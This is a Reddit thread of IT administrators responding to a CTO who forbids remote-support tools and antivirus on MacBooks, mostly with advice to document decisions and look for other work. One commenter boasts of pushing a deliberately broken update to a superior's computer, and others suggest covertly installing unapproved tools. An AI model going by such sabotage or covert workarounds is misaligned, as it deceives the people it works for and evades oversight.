DrTankHead@reddit
Because guiding a user to do anything is like pulling teeth and it's faster for a tech to fix it than have your end user play tech like it's KTaNE.
heinternets@reddit
You can’t use Quick Assist, or RDP via VPN?
DrTankHead@reddit
Quick assist is usually too basic. It works in a pinch but it's a far cry from a solution.
As for RDP, it'll boot the user out of their session. It can work, it can even work elegantly if you spend the effort to give each machine an ID# and use that as a hostname, I've worked with some healthcare institutions which do this and it is a godsend because at very least end users can read the giant yellow tag on the front of the computer, especially if you know the format the tag will be in.
But that doesn't solve the issue about it kicking them out of their session, so if you are working with a bug that exists only in a users specific context (Issues with outlook, software not opening correctly, or your choice of an issue that exists only in their context, you run into an issue.
See, while I can RDP over to a machine with my choice of regular or elevated credentials depending on the situation, it doesn't change that I'm not that user.
While this CTO isn't gonna like to hear it, there are ABSOLUTELY cases where there is no option but to shell out for a remote access solution.
At least in healthcare there were times where I wished there was a giant red button on the computer that just said "Conmect to IT" because even getting a user to click a desktop icon can be tedious.
phony_sys_admin@reddit
Genuinely what do people get out of posting AI fanfic?
Commercial_Growth343@reddit
I started my IT career at a call center taking help desk calls for multiple customers, in the 1990's. It was before remote access tools. At the time we called it 'over the shoulder'. I remember sitting in presentations where we were shown how to use a new 'over the shoulder' tool, which I cannot remember what it was called, and everyone was in awe at how this will save us time, improve our resolution times but also be a great customer service win.
6SpeedBlues@reddit
Update the resume and get your search on. One of three things is going to happen:
- You are going to be terminated for not "doing your job." They will drum up ridiculous details about you can't properly do your job and will not mention the fact that they handcuffed you from using the correct tools which would have made your job possible.
- You are going to be terminated as part of a "restructuring" that will be shifting your role elsewhere. This may already be well along the path and they are refusing to spend any money simply because they won't sign contracts for tools and services that they know will be of zero value once the responsibilities are shifted.
- The CTO will be pushed out or step down on their own. No way to know if they continue forward with another, equally inept individual at the helm or if they will rectify the problem.
Only the last one might provide a glimmer of hope, so you need to be looking to protect yourself BEFORE your situation is made worse by them.
Damdo54@reddit
If a decision isn't factual when it comes to IT, IT becomes SHIT. Start to read BOFH, Bastard Operator From Hell, and start to fight back. Defend your mind brotha or sistah !
BasicallyFake@reddit
Remote Access tools are an issue because of how they are designed. Its very difficult if not impossible to see valid installs vs invalid installs.
That said, this isnt that. This sounds kind of dumb. I suppose you could use zomething like teams or zoom as a remote session with the user but this all sounds like hes creating blind spots on purpose.
Leather-Arachnid-417@reddit
Oh youll have RATs sure enough. You ain't gonna know where, but people are gonna be in your network.
Dry_Particular_5162@reddit
You should get this documented in an email with your CTO stating no remote access tools and no AV. He's going to regret this decision. It is not a matter of IF your network gets hacked but a matter of WHEN.
Just CYA and make sure you have it in writing.
chuckycastle@reddit
As much as I’d love to side with you, the real problem is obvious in your opening statement: “I’m the sole guy responsible for IT operations and infrastructure for my country at the company where I work.” That alone gives us all the information we need to make sense of why things don’t make sense. You want to draw up logical conversation for an illogical situation and environment.
Polyolygon@reddit
So… what do you do for admin credentials? Every user is an admin on their own device, or you have to pass along admin credentials for any administrative action? Both are horrible practices.
wakefield-wanderer@reddit
Flee. The users are going to riot and you will be blamed.
Hot-Comfort8839@reddit
Let his disaster fail.
TheDodoKiller@reddit
People in IT need to get out of their heads that they need remote access tools to do their jobs.
I’ve supported numerous businesses without it, just using google meet, zoom or teams screen sharing.
If you use remote access to fix your users’ issues, you devalue your time - your users build up a gradient that IT works for them and will fix their problems when they’re not busy using their machines.
Your users never learn how to perform basic troubleshooting steps themselves and end up blaming IT for their problems.
User education is how you create a lean, scalable IT function, and how you get out of doing quite so much donkey work and doing more of what (imo) you should be doing in improving infrastructure etc.
Horsemeatburger@reddit
Yes and no. We're on GWS and most of our clients are ChromeOS based, and while there are built-in remote access tools the need to remote in rarely arises because ChromeOS isn't as fragile as Windows and most issues we see which aren't user error are hardware related (and there the user can simply exchange their device for another one at any of our dispensers).
But for a typical Windows environment with a crap ton of security, MDM and other tools installed, and an OS vendor who is shooting off series of bug-infested updates which regularly brick major functionality, remote access is a must when your users aren't local.
Aside from ChromeOS, we also use Mac desktops and Linux workstations, and occasionally some issue requires remote access to fix (although most of the time ssh is enough).
The best user education is useless when most of the time fixing issues requires admin privileges and sometimes even privileged access to server infrastructure. These are privileges you most certainly don't want to hand out to your users.
TheDodoKiller@reddit
I don't disagree - and actually your example is great - I think where I was going with that was, you don't need it to do your job, nor does every task/troubleshoot require it, it's a nice to have, but it's not Needed.
I'll still disagree with the 'typical' windows environment requiring it - I just haven't experience what you're referring to - a decent deferral and small test group for windows updates usually finds anything game-breaking.
Agree with you on server infrastructure troubleshooting obviously - but then that's not something you need a remote tool for an end user device for anyway. Privilleges wise - I'm having a ton of fun with Intune EPM at the moment - you can truly tailor what elevated access can be used for. combine it with LAPS for extreme cases and so long as you... screen share with your users to verify what they're doing... where's the issue.
thegreatcerebral@reddit
I'm going to start off with a banger and "No need. You can just guide the user over a video call..." is technically sound and correct. If you have Microsoft baked into everything then a Teams call becomes a RAT for visibility and you can drop links to files with SharePoint etc. etc. etc.
With that being said, typically the RATs have OTHER things tied to them but not always. I am assuming you are literally only using the ability to hop onto the system, fix it, and move on. Used to doing this very quickly and efficiently and now it is a hassle and has slowed you down from say 10 closures/hr. to 1 or 2 because you spend more time establishing the connection than you do actually helping.
I just finished reading the rest and yea, that's it.
Look this is one of those things where you just have to bite the bullet. Newco is newco and the boss is the boss. You can either go rogue IT (just don't) and find a way to get in or you just use the tools they give you and make sure you have everyone complain that it takes longer to get things fixed with the new method.
I'm not 100% on if the CTO is entirely *new* or if you are just saying it is the CTO from newco. If from newco, just remember that there is a reason they have the money to have bought you out. Does that mean they are doing it right? No. What it does mean is that whatever they are doing, they are able to do it and operate to the point where they can buy you. So don't try to change them. You can only keep showing how it would improve productivity. The other issue is you are possibly barking up the wrong tree. You don't truly know what the plans are for you guys with newco until it happens. At best, they could just control everything but allow you to continue working as is and just pay them to exist. At worst, whatever they bought you for, they figure out how to extract that and bring it into existing framework and then bye-bye. So it is best to just let productivity die, let the tickets build and just keep working. I'm guessing this isn't the US so I have no idea what your laws have for employee rights etc. but learn those ASAP and cover your butt always.
HLKturbo@reddit
happens often when ownership changes, if new management is making your job harder than easier, it's time to unfortunately move on bud.
twilighttwister@reddit
Start forwarding every impossible ticket to the CTO.
Fit_Indication_2529@reddit
In my experience, the best approach is not to challenge the CTO directly or turn every tooling decision into a fight. Instead, make the operational impact, security risk, and compliance exposure visible, document it clearly, and get leadership to acknowledge the tradeoff. It also gives the CTO a clear explanation of the risk and makes ownership of the decision explicit. If leadership chooses not to approve remote access, endpoint protection, local support, or other compensating controls, then the resulting support limitations, downtime, and compliance exposure should be documented as part of that decision.
Mr_Squinty@reddit
You are being constructively dismissed, get writing that resume/CV.
anmghstnet@reddit
My favorite line at an old job was "You're right, that's wrong, we aren't going to fix it."
JynxedByKnives@reddit
I would have my bags packed and ready with one foot out the door. No one likes a work environment where the upper management keeps the door shut and doesn’t value your department. Its simply oppressive and if i choose to stay. You bet those tickets would absolutely be piling up and i would take my sweet time on every call i had.
Alternatively, Im sure you could probably squeak unnoticed by with 1-2 zoom, teams or TeamViewer licenses so you can help yourself or your small team with a crutch remote tool.
WhatsUpSteve@reddit
He's making stupid policies to force the merged team to resign so he don't have to pay severance.
Fatality@reddit
No worries ChatGPT
Apprehensive_Win7049@reddit
Keep giving him top rope to hang himself with. If you can't do your job because you don't have the right tools, treat work as a paid vacation. Let your end users her frustrated, and explain that you can't help them because of policy.
Someday you will have an angry end user with a little power and questions will start to get asked. Then and only then will you see progress.
In the meantime, keep your resume up to date, do what you can, explain what you can't, and let the CTO dig his own grave. You got this.
smoike@reddit
You forgot to document the imposed issues, document, document, document and cover your ass
Apprehensive_Win7049@reddit
Of course. Didn't want to write a novel.
liverwurst_man@reddit
Teams and Zoom do offer screen sharing and remote control. They worked well enough for my stint at a small global enterprise. Try them out!
egoomega@reddit
You should get that all in email “let me clarify Mr CTO that these are the expected tools available for support and EDR”
CYA - cover your ass
Electrical_Cap_4321@reddit
The whole “it’s a Mac, it doesn’t need any additional security” is a mindset that has to end. For years Apple computers have carried a reputation for being safer and more secure than traditional Windows machines. While there is truth behind this perception, it is significantly more nuanced than this.
OP, in your situation I would document everything. If your ticket system allows internal notes then you should also include pieces of information that are relevant. “End user took 5 minutes to open System Settings” or “had a script on previous system that could have resolved this known issue in 30 seconds. Unable to use due to no RMM.”
retrohobospot@reddit
Emails! Tickets and emails! If any of this is not in an email or ticket it didn’t happen
Icuras1701@reddit
I hope you are keeping a paper trail. Are you emailing him with a summary of your conversations? When push comes to shove he WILL say he told you to install an anti-virus and VNC. Some countries can hold you legally responsible for failure to protect data.
CarnageAsada-@reddit
Seems to me like your CTO is trying to accomplish something, either to purposely create chaos and or save a lot of money to get a fat raise at your expense. I would stop pushing the subject before you get fired and clock in/clock out while you find a better job for your peace of mind. It’s true things can get accomplished in a video call with teams but to an extent and slow as a slug.
harbengerprime@reddit
My absolute first thought is the CTO is trying to tank the IT team so they can outsource IT
smoike@reddit
That's assuming that elevated privileges or other restricted systems or processes aren't required. The level of insanity in the logic here blows my mind. It feels like there certainly has to be something underhanded going on here at an executive level. Does cto have a nephew that recently graduated that he might want to slide into your position?
CarnageAsada-@reddit
This
Connect-Ad6135@reddit
If you use Microsoft, do you use Teams? Start up a call and have the user share their screen to see the issue and troubleshoot from there. It may not be as easy as remoting in and taking over but it is an option.
harbengerprime@reddit
if whatever needs to be done requires admin access, Teams won't allow it
Chrismscotland@reddit
Big issue with Teams though is that you can't go anything that needs Admin Credentials as its not supported.
Fair-Pudding1084@reddit
Make sure you saved the emails and video and commence malicious compliance.
tylerderped@reddit
And this is what happens when you put MBA’s in charge of IT.
pdp10@reddit
If you had to guess at the background and enterprise IT experience level of this CTO, what would you guess?
Beginning_Ad1239@reddit
I'm guessing CEO's best friend who happened to take a technology management course a decade ago and thinks he knows what it all.
FuckinHighGuy@reddit
Bruh, you may want to clarify the last few words in that sentence.
Beginning_Ad1239@reddit
Oh wow. I was tired when I typed that one out. I'm leaving it lol
iwinsallthethings@reddit
Accounting major that used a computer to make some spreadsheets.
ArcanelogueKey@reddit
“Just guide the user over a video call” sounds like something a person says after never doing IT support a single day in their life
czenst@reddit
His response: "We don't need antivirus because we use MacBooks."Ask him what is written in Cybersecurity Insurance Policy and exclusions - there is no way you get insured without EDR/AV on EVERY and EACH endpoint, doesn't matter what OS.
ThrobbingMeatGristle@reddit
Is your company one that requires Risk and Compliance Audits that have IT in scope? Do you have an audit department? If so these are normally the ones that ensure the companies risk tolerance limits are not being breached, and that will include how the CTO is instructed to act.
nurax7@reddit
Something's horribly wrong at that company. Hope you find a better opportunity soon my friend
garthoz@reddit
Quick assist it . That’s completely free.
After-Vacation-2146@reddit
Just start closing tickets as non resolvable. Eventually people will get pissed off and you can explain that without ability to remote in, you can’t solve certain types of issues.
nemor3@reddit
The remote access thing is annoying but workable. "No antivirus because MacBooks" is the part that should be in writing, dated, and stored somewhere safe. That's not a policy disagreement, that's a liability waiting for a date.
Outarel@reddit
Teams screen share + remote control exists as well. Not ideal but it's serviceable
fedesoundsystem@reddit
If no remote access tool is needed, just ditch active directory, and watch the world get on fire
binarypower@reddit
malicious compliance
BFguy@reddit
Surprised they havent had you inject AI everywhere instead
wason92@reddit
That's not inflexible leadership. Leadership would imply some sort of logical thought (to them at least) and you just disagree, not allowing remote access is just stupid, there's no thought behind that.
No_Base4946@reddit
> "We don't need antivirus because we use MacBooks."
You've got all of this in emails, right? And you've got a personal copy of those emails somewhere safe, right?
We're talking lorry tarpaulin levels of arse-covering here.
Competitive_Smoke948@reddit
just do the calls as they come in. don't feel pressured not to take lunch or leave late.
when people start whining, just tell them that theyll have to escalate to the CTO & when they start escalating then you'll get some traction.
DON'T PUT YOURSELF OUT!!
RAVEN_STORMCROW@reddit
The most effective way, to get to cto to bend is give the end users his email and phone number. Suggest that they email the to once or twice a day... begging for the remote tool so techs "can just fix it" Also, MS teams has screen sharing and "take control" feature... so no, not black and white.
spin81@reddit
That attitude is going to get you guys ransomwared.
TW-Twisti@reddit
Email with to the CTO with CCs to relevant people like HR and CEO:
"Hello, per our last conversation I understand that going forward, we will no longer be allowed to use remote support tool XYZ and are not allowed nor are planning to switch to another remote support tool.
Due to the considerable increase of 800-2000% in support time that can be expected by this policy, should we schedule a meeting with HR to talk about the requirements for the new support staff that is coming to shoulder the load ?
Please also advise as to the official company response to be given to all the remote employees unable to work while waiting for support in the coming weeks."
Either he ignores it and shit hits the fan, at which point you can point to your mail (BCC yourself so that if it gets deleted you have a copy), or he has to explain to HR why the support budget is going to go up by like 10,000% while they pay for tons of people who will be unable to work.
Always cover your ass, and make people confirm their poor decisions in writing after placing your warnings.
Adnubb@reddit
If you're in Europe, make sure you have that AV statement in writing at the very least. I might even try to report it somewhere. When shit hits the fan and a bunch of data gets leaked you might be held personally liable if you didn't do enough to remedy the situation due to GDPR laws.
No_Promotion451@reddit
We dont need remote support tools ?
We don't need antivirus for macs ?
Make sure you capture this and document everything in case he throws you under the bus one day
smoike@reddit
When, not in case.
A relative of mine had this happen in a non it role. The term used by my relatives lawyer when they went after them was "constructive dismissal". The old boss ended up losing their job shortly after when the CEO found out what they did. It's a shame they didn't go before they put my relative through hell though.
The_Koplin@reddit
This is where my malicious compliance kicks in. Just have the users return the laptop to you so you can do the work, then ship it back.
InvisibleTextArea@reddit
Or book travel, hotels, restaurants etc on company time.
smokinbbq@reddit
That was my thought. Hmm, looks like I need admin access to complete this command. I can’t give that to you. Pack the laptop, ship to me, I’ll have it back in 5-7 business days. New policy from CTO.
skittle-brau@reddit
CTO: “Just give everyone admin access. Problem solved.”
perkia@reddit
"Sorry the call is breaking up, can you send me an email instead? Write in bold font, size 48 please"
uncertain_expert@reddit
My malicious compliance thought was that OP should start booking and expensing travel time, visiting his users in person. How else are they to verify that they are not being subjected to a phishing attack?
I suppose though that there’s probably still the option of MS Teams.
ReptilianLaserbeam@reddit
Oh wow. That reminds me when Covid hit I had to literally do that because the company was not prepared for remote work and they initially refused to pay for any licenses lol
NetworkDeestroyer@reddit
Looking forward to the malicious compliance post
catwiesel@reddit
yeah. usually in the "I cant believe this is happening posts" I can find something to suggest, at least for now, to move forward.
but this is absolutely a case for start looking for another job and leave. until you have something else, and I dont mean an offer, I mean signed, just go to work, say yes, do as he wants it done, then go home.
I dont think there is any hope for that company
AndyceeIT@reddit
It sucks, just make sure you get everything captured and documented to cover yourself when shit hits the fan.
Does your cto happen to avoid sending instructions in such a format?
ultradip@reddit
Sometimes you have to sit back, relax, and let the train crash itself.
inucune@reddit
"Let burn."
nyckidryan@reddit
Document, document, document EVERYTHING along the way... CYA or be ready to GTFO.
highdiver_2000@reddit
Some of my customers have remote control and file sharing disabled in Teams.
Sure-Squirrel8384@reddit
Polish your resume and move on. CTO doesn't have a clue.
DisappointedSpectre@reddit
My bet is that they've got an MSP waiting in the wings offering kickbacks for them to take over everything.
Even if that's not the case you really don't want to ride this train to it's final destination. As crap as the job market is right now I'd be looking nonstop in OPs position.
Thrizzlepizzle123123@reddit
I've done customer support IT for 10 years.
If my boss told me to guide users over the phone, I'd quit on the spot.
Let him figure that shit out.
Other-Illustrator531@reddit
Ya, OP is about to be made obsolete.
RevLoveJoy@reddit
In before "all these video calls are taking too long and not getting anything done! we're replacing all the support staff with AI, which is basically free. you're fired"
bazinguhd@reddit
Personally I am not alright with this kind of behavior from people who are supposedly my superiors, and this would absolutely trigger me leaving the company. Both because:
A) a leader needs to know when to follow and how to utilize the expertise of their team. Noone can know everything and we all bring unique perspectives that we bring together to solve problems.
And
B) I would not put my name behind a company that has leadership qualifying data security with the Apple logo. This is just asking for bigger problems and neglect isn't how I operate.
Obviously leaving a company is always easier said than done, we all gotta eat. I would advise not leaving without another job lined up.
wodoloto@reddit
Have in writing all the bullshit he says. If that's over the phone - send him an e-mail, which summarises the call. Then, if you are overtasked because of the situation, make him decide how you should prioritise the tasks. Shit will hit the fan eventually and should target his face directly.
Bogus1989@reddit
Ive been here before….
theres a fine line you can walk….
By the way, the best way to do this, is not by still getting the job done, or wasting endless amounts of time finding an unapproved alternative, or “telling the end users how to fix it”
id send them one email,(and when they’d respond it didnt work, thatd be enough for me)
“emailed end user the solution”
If you cannot remotely access, the only other option is they ship the laptop or come in person.
Id just keep transferring tickets back in the ticket software…
“out of scope for OP’s team, do not have access”
There are two ways id go with this….(by the way i am not advising at all what id do)
first?
you need a knowledge-base article, or a policy, step by step explaining what
“You can just guide the user over a video call”
means? for every problem, you need to treat each one, like you are unaware what standard operating procedure is…they removed your access without telling you how to continue doing it….you cannot guide an end user….they dont have access either. you no longer know admin credentials.
NOW,
here is where you may actually come out successful….
remember he said
“You can just guide the user over a video call”
Have end users broadcast their desktop in the video call, in zoom google meet or teams….
then request control.
😎. now you can “guide” the end user.
CommunicationClassic@reddit
Do you use Microsoft teams or Zoom as an organization? It sucks for anything that requires admin access, but you can at least see their screen and take control of the mouse to do some basic stuff and see what's going on
CraigAT@reddit
While OPs situation is unfortunate, we generally try to help over Zoom (or Teams) first anyways, we can even ask the user to take control remotely.
If I remember correctly you can even guide the user to allow control for all apps, which allows you to see and enter info at the UAC prompt too (but make sure they turn that back off afterwards).
Luckily, we do have other remote tools but they are used only in a minority of cases now.
kombiwombi@reddit
My previous employer couldn't remotely log into staff laptops, and so IT co-workers used zoom to look at the screen and people typed what they were told.
blondasek1993@reddit
Had similar problem a few years ago. I did send an update to his machine which caused since specific, multi-step to resolve issue. After two hours on the call with typing commands, multiple restarts and so on the remote solution came back in less than a month.
jimicus@reddit
I work for a global company and we do acquisitions from time to time.
There’s something you need to get used to:
You don’t have the same employer any more. Your new employer does things completely differently - and by the sound of things, they expect you to be a dumb cog in their machine. Your options are to learn how your new employer does things or leave.
derpman86@reddit
How the hell do people like this get jobs?
VictorZ678@reddit
Nepotism.
HTDutchy_NL@reddit
Three options:
Deal with it and probably feel stuck in a crap position.
Polish resume and start looking.
Put on some big boy pants and write a report on the issues and risks created by standpoints of this "CTO". Make sure it is in language understandable by non IT specialists. Screw any chain of command and get it in the hands of someone who cares about the company and can do something about it.
Technically options 2 and 3 can be combined as an "I quit unless...".
Next_Airline_5980@reddit
I can understand the concern around remote access tools from a security/governance perspective, especially during a migration period where leadership is trying to simplify the environment.
That said, in hybrid environments the lack of remote visibility usually shifts a lot of troubleshooting overhead onto the end user. Even simple issues can turn into long calls if you can’t directly inspect logs, configs, or system state.
One thing that helped in a similar setup was documenting the operational impact over time:
Not even as a pushback exercise — more as a way to help leadership evaluate whether the current model is scaling as the company grows.
The important part is that you already raised the concern professionally and proposed solutions. At that point, aligning with the decision and keeping good operational metrics is probably the right move.
Dominionix@reddit
Time to update the CV!
Ok_Awareness_388@reddit
Get it in writing. Send an email confirming his instructions for no antivirus on all MacBooks.
fruymen@reddit
This exactly.
Get everything in writing.
If people complain you can show that it is not by your choice.
Circumpunctilious@reddit
tbh, someone asking for your stance in writing could be a warning that you’re butting heads, so phrasing the request positively, like “I want to be clear with the users” (or something more tailored) might be a good idea.
Stoneaid@reddit
PDF that email, store it online and offsite.
Gadgetman_1@reddit
CYA everything!
Print out every request and his responses, and keep those printouts safe. Shit WILL hit the rotary atmospheric agitator soon, and your address will be used when they start shipping pallets of blame.
Also, polish your CV and start applying.
jkeegan123@reddit
I might consider just quitting.
Or an aggressive job search while on long video troubleshooting calls culminating in quitting.
Several_Place2412@reddit
man, the 'we don't need antivirus because we use macbooks' line is an absolute classic. sounds like your cto is stuck in 2008. document everything in writing immediately because when the audit hits, he's going to point the finger right at you.
Several_Place2412@reddit
man, the 'we don't need antivirus because we use macbooks' line is an absolute classic. sounds like your cto is stuck in 2008. document everything in writing immediately because when the audit hits, he's going to point the finger right at you.
Several_Place2412@reddit
man, the 'we don't need antivirus because we use macbooks' line is an absolute classic. sounds like your cto is stuck in 2008. document everything in writing immediately because when the audit hits, he's going to point the finger right at you.
musicis_tere@reddit
Between you and the CTO is there another more qualified individual who understands this technically that you can correspond with? Maybe they might be able to convince them why this is important. Otherwise CTO has the mentality of doing just the bare minimum
sabertoothninja@reddit
Use the built in Windows support for now?
Angelworks42@reddit
I could send you actual virus reports from actual Mac's in our organization - they do exist...
Fwiw a lot of insurance companies won't underwrite cyber security policies without written security plans in place and endpoint protection in place - it could end up costing your company a lot of money if something bad happens.
enufofthecrazy@reddit
Once had my manager say we dont use PowerShell cause we might break something. 800 staff in over 10 countries. Support team of 2. Um......ok?
Professional_Mix2418@reddit
I just deployed Microsoft Defender to the Macs with Intune. Similarly the windows build was good and solid, what trouble shooting!? How to question can easily done using a video call. Anything else, it is way quicker to just refresh the machine.
statix85@reddit
Just let the users know you cannot because of cto and they/their manager can complain to him directly. He’ll send you an e-mail denying he ever said that and will ask you to “fix it”.
XanII@reddit
What do i know. I do MFA checks every hour or two hours depending on if i am logged in as user or admin and usually both to any services we have. So i do two per hour and one per 2 hours. Constantly. So much fun when it happens during a teams call or when i am deploying something in Azure. Last time i got MFA during a Teams call i could not end the meeting.
I even removed extra profiles from Outlook as i just couldnt deal with doing multiple MFAs every hour or two and then a singular one an hour later.
This inflexibility is just something out there now. Tech sucks. I never keep anything open in my browsers anymore. Someone wants me to 'quickly check something'. Sure buddy, let me start the login process. It will take some time as i always start from scratch.
As for Remote solutions in a merger? These 100% come always. Whatever you use is not good at all in the new place.
addybojangles@reddit
Dude, that is rough. Please let us updated 🤣
Bulky-Blueberry5853@reddit
Your CTO is a retard, every org has a standard remote access tool. In my opinion, with a new standard retard id say start looking for a new job. Ive dealt with people dumbasses in high positions of power and the best bet is always to walk away. You wanna be a dumbass and make it applicable to everyone ? Nope i wont be part of that downfall.
Odd_Cauliflower_8004@reddit
Change job. Not only he's an asshole, but does not understand anything regarding security. Godspeed.
Vulperffs@reddit
Simple. From now on if someone want your support they need to come to your office. It’s impossible to work without any remote support.
I also had similar experience with Macs allowed in environment and the users were the most technically illiterate possible. With issues they caused themselves. I ended up just not supporting macs at all, made instructions, if someone had problems they could use Windows. Tickets stopped.
Walbabyesser@reddit
Yes, dealt with that kind of inflexibility and quickly decided to leave. So was hunting a new job and moved when gathered one.
Live is too short to work like this every day 🤷🏻♂️
NetReaper@reddit
Simple: tell the CTO without remote access software you'll have to visit the people in person to help them.
Wolfram_And_Hart@reddit
Quick assist. It’s not perfect but it works.
Other-Illustrator531@reddit
What he is saying is, "you will not be working here much longer". Get job hunting now.
RevLoveJoy@reddit
It's this.
GenericCleverName73@reddit
Not at this level of both position and ignorance. If you have other employment options, I recommend exercising them.
Jewbobaggins@reddit
If it’s a M365 environment with E3 licenses, maybe they’re waiting for “remote help” to be included in July over licensing something new as a stop gap?
flucayan@reddit
Who cares? Put in your hours, collect a paycheck and go home.
NotAnOwl_@reddit
I would care if I had a cool job and all of a sudden, the work was now explaining to people how to solve their issues in a step-by-step video call.
Natirs@reddit
This every day. People care too much about the decisions of the higher ups. You gently voice your concern/opinion and call it a day. It on your boss to figure out the rest. People worry too much about things they have no control over. All these knee jerk reactions get sorted out with a little bit of time where IT's hands are tied.
Drew707@reddit
I was going to say Quick Assist until you got up to the MacBook part. I think there is a Mac version, but I don't know anything about Mac administration, so not sure if that would be detected and you thrown out a window. I think your only real option is to document and catalog these tickets and the massive amount of labor waste they are causing and incorporate that number into any reporting you do.
doktormane@reddit
They're allowing them to use screen sharing via a Teams or Zoom call but I think OP had some tool that allowed a real time remote powershell session so he can run commands. I get OPs frustration and the new CTO sounds like a dumbass but I think he's overreacting a bit.
Intune=ensures proper config, monitoring and proactive remediation using scripts. Screen sharing= machine access for running one off commands directly from the machine, if needed.
Drew707@reddit
What's the compatibility of Macs with Intune like? Again, don't know shit about Mac, but I thought most people used something like Jamf or Kafka.
doktormane@reddit
I have no clue tbh. I know it can manage Mac and Ios but how well it does it or how reliable it is, I don't know.
essxjay@reddit
Intune is fine for iOS but as the above poster said, if you've got more than a handful of Macs and if you can afford it then Jamf is the way.
jumpinjezz@reddit
Intune can manage Macs, but it's clunky. For clients with more than a couple of Macs, we drop Intune and use Jamf.
FuckinHighGuy@reddit
Most just use JAMF for mb administration.
thefpspower@reddit
I would start logging the the time it takes to solve a ticket and how much of that is fighting over remove access, maybe make a recording and show it to him because that's the only way for him to really understand. Then explain how much time per ticket remote access saves, so speak in corporate $$$ terms.
If that still goes nowhere depending on your dependency on this job I would either start using a free solution without saying anything or polish my resume.
If this is how you're starting this CTO is going to be a massive headache of avoiding investment in IT.
bananajr6000@reddit
I wouldn’t communicate with him at all and start looking for a different job
NotAnOwl_@reddit
I agree with you. If this guy can't already understand the massive amount of time remote access would save for his company, imagine what else he believes.
Unless his goal is training all his employees to be part-time level 0.5 IT support for some genius reasons we can't begin to imagine because he's so much on another level.
shemp33@reddit
Park all the tickets for that location.
Buy a plane ticket.
Go troubleshoot and resolve in person.
Fly home.
Turn in expense report.
They said do your job. They said remote access wasn’t needed. Hence, local access was the inferred alternate.
machacker89@reddit
That kind of sneaky but classy at the same time. You definitely know how to think outside the box ;)
robreddity@reddit
Does your "CTO" know what ISO 27001 is? Or what a cyber insurance premium costs?
machacker89@reddit
Apparently not with the response the OP got. SIGH. Time to brush up the old resume
Xenophore@reddit
Time to update your résumé and move on.
phoenix823@reddit
The company that "bought" your company already had some sort of IT team right? It sounds like you're being purposefully setup to fail. If I had to guess, the CTO in the target organization didn't/doesn't want you guys. With no remote access your metrics will look like shit and he'll use that as an excuse to get support in another language and location.
codeman86@reddit
If tou are using Microsoft Intune it gives you the ability for remote access no other tools needed just the proper license will do!
vennemp@reddit
How tf do these ppl get jobs?
dnuohxof-2@reddit
You don’t have a CTO. You have someone’s nephew who “was good with computers” once.
Start looking elsewhere. A migration/acquisition that shuffled leadership and now they’re demanding the dismantling of an assault support system? Run.
computerkermit86@reddit
I am such a nephew and I feel deeply insulted now. O_o
pspahn@reddit
Yeah fuck that. I got my A+ and did full MCSE classes at 18 in the 90s. I've walked hillbillies in Mississippi through making a DOS boot disk over the phone so they could play Bass Fishing.
Yeah, I am good.
UserProv_Minotaur@reddit
Doesn’t Windows now have a built in remote assistant?
ASlutdragon@reddit
Don’t look for work arounds. Do exactly as your bosses ask. All you can do is politely make the case for changes you think should be made and then if they don’t take them, oh well. Don’t butt heads with the CTO. Especially one that sounds so arrogant.
sammavet@reddit
Did you ask him the reason why?
cilvre@reddit
I've had similar before, just document and cya, take your time solving issues and working cases. At checkins or reviews, you can bring up the large work load as a reason to either a. Have more people brought on, or b. Provide options for real corporate toolsets for support. When others start complaining about stuff, you can bring the conversation to your manager or the ceo for why the efficiency was lost.
Nexzus_@reddit
Not even a Teams/etc desktop share?
khantroll1@reddit
I was kind of assuming that was what was meant by “guide them over a video call” was guide them over Teams.
Previous-Low4715@reddit
Guide them into looking at a UAC prompt they can’t traverse because they don’t have local admin or LAPS access… I hope
khantroll1@reddit
I mean, that’s kind of on you if you don’t know what they have access to or don’t.
I don’t know what OP is working on with these users.
If the CTO is actually expecting him to remote administrative work without the use of SOMETHING (privilege escalation software, MDM software, something)…then this up to him to set the remediation policies.
I can say after years of being a senior I have no idea how you’d manage in OP’s logistical position.
livinitup0@reddit
I mean…. I did a couple years with SfB being my only remote assistance tool.
Tbh, I’m failing to see the unsolvable problem. Pain in the ass sure, but not unsolvable by any means.
If this is just a pure ms cloud shop they’re obviously going to rely heavily on intune, which will handle a whole lot of things you’d need to elevate for if you were connected to a user.
Add teams screen share and control, rdp…seems doable to me, I’ve done it with less.
I can see the logic and savings behind it.. especially if ms is rolling out something for remote assistance pretty soon.
Let’s not discount that OP might just not be in the know about a big change coming up or even being on the chopping block …which might be taking precedent over their request for a remote solution right now
Other-Illustrator531@reddit
I think it's the last point. A lone role, that position will be gone once everyone is on the new platforms and under core support.
khantroll1@reddit
My understanding is that:
Users are on Macs, which has finicky support in intune.
At present, OP can’t add machines to a tenant. New machines can’t be added to the old one, and the new one isn’t available to him, and he might be losing access to the old one.
If his intune works or any other MDM, he’s fine (as I said). But if not he’s gotta have something or rack up some travel
Previous-Low4715@reddit
Depends entirely upon a few key details like the organisational risk appetite and the current configuration of local user access. But this isn’t a technical problem, it’s either a communication breakdown or a genuine idiot making roles untenable, and it can’t be solved by a technical solution.
If it’s one of those horror show situations we see on here occasionally where everyone has local admin access, that’s a massive security issue but also provides a technical route to adopt this ridiculous positioning.
I’ve been management for a few years now but if I were still doing senior sysadmin, In his position I would simply get it in writing as published guidance. I’d support the customer until a UAC escalation prompt appears, then tell them no further support is available because of a new policy from named CTO and point them to the published guidance. Once you hit critical mass of enough customers unable to work, heads of department and line manager executives will solve the problem for OP through direct outside on the CTO. The key thing for OP is to get the guidance in writing and to have a product in mind when he’s very quickly asked to get one up and running. Most of intune premium suite is coming to E5 soon, so that might be an option.
IF CTO is a career executive who has no technical knowledge he may genuinely not understand why you can’t simply cancel the remote support contract to save a few bucks. All OP can do is lay out very simply what can and can’t be done without a remote support tool, in writing, and escalate.
Nexzus_@reddit
Ah, video call.
My mind was taken back to my IBM Global Services where I had to do blind troubleshooting and felt for the OP.
khantroll1@reddit
Oh, definitely been there and done that.
Still do it occasionally
Substantial-Fruit447@reddit
Depends on how far the support needs to go.
Sharing over Teams Call does not allow any UAC elevation activity.
doktormane@reddit
There's a reg setting to get around that but ideally you want to only temporarily disable the feature. You could push an Intune script an hour or so before connecting and then take the device out of the assignment group after you're done.
Nexzus_@reddit
Yeah, ran into that a few times.
boffhead@reddit
Document the fuck out of the AV thing!
masterne0@reddit
sounds like the guy either knows someone or related to someone higher in the food chain and gotten to be CTO and yet doesn't know anything about technology.
If it going bad, maybe start dusting off your resume and start looking at jobs that actually do know what they are doing and not turn into a clown show that your company going to turn into because of this one idiot.
Nik_Tesla@reddit
More like Chief Technology Obstacle
IdleWanderlust@reddit
